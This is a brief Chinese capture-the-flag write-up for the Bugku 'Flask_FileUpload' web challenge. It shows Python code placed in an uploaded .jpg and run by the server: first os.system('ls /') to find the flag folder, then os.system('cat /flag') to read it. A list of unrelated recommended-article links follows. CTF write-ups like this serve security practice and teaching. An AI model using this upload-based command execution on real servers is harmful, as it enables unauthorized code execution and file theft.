Bugku-web-Flask_FileUpload

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
相关推荐
han_几秒前
JavaScript设计模式(三):代理模式实现与应用
前端·javascript·设计模式
好家伙VCC几秒前
# 发散创新:用 Rust 实现高性能事件驱动架构的实践与优化 在现代软件系统中,**事件驱动编程模型**已经成为构
java·开发语言·python·架构·rust
梦醒过后说珍重2 分钟前
Python 工程化实战:如何将复杂的EndoMamba感知损失封装为“即插即用”的独立模块包
python·深度学习
~欲买桂花同载酒~5 分钟前
项目安装- React + TypeScript
前端·react.js·typescript
爱钓鱼的程序员小郭5 分钟前
阿里云自动配置安全组IP白名单
python·tcp/ip·安全·阿里云
光辉GuangHui5 分钟前
SDD 实践:OpenSpec + Superpowers 整合创建自定义工作流
前端·后端
梦醒过后说珍重8 分钟前
PyTorch 工程实践:如何优雅地将 ViT 大模型封装为即插即用的感知损失(Perceptual Loss)
python·深度学习
超越自我肖11 分钟前
python--函数返回值之None类型
python
ssshooter13 分钟前
infer,TS 类型系统的手术刀
前端·面试·typescript
用户31673613034213 分钟前
图片懒加载,我总结了三个方式
前端